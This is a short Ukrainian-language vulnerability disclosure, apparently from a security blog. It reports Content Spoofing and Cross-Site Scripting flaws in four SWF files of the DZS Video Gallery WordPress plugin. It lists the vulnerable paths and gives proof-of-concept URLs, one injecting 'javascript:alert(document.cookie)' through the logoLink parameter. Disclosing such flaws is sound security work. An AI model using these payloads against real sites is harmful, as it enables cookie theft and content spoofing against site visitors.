У квітні, 24.04.2014, я виявив Content Spoofing та Cross-Site Scripting уразливості в плагіні DZS Video Gallery для WordPress. Про що найближчим часом повідомлю розробникам веб додатку.
Стосовно плагінів для WordPress раніше я писав про уразливості в DZS Video Gallery для WordPress.
Всього є 4 флешки, які уразливі до CS і XSS. Тобто всі флешки в сумі мають 12 уразливостей.
http://site/wp-content/plugins/dzs-videogallery/deploy/preview.swf
http://site/wp-content/plugins/dzs-videogallery/deploy/preview_skin_rouge.swf
http://site/wp-content/plugins/dzs-videogallery/deploy/preview_allchars.swf
http://site/wp-content/plugins/dzs-videogallery/deploy/preview_skin_overlay.swf
Content Spoofing (WASC-12):
http://site/wp-content/plugins/dzs-videogallery/deploy/preview.swf?video=1.flv&thumb=1.jpg
Content Spoofing (WASC-12):
http://site/wp-content/plugins/dzs-videogallery/deploy/preview.swf?video=1.flv&logo=1.jpg&logoLink=http://websecurity.com.ua
Cross-Site Scripting (WASC-08):
http://site/wp-content/plugins/dzs-videogallery/deploy/preview.swf?video=1.flv&logo=1.jpg&logoLink=javascript:alert(document.cookie)
Вразливі все версії DZS Video Gallery для WordPress.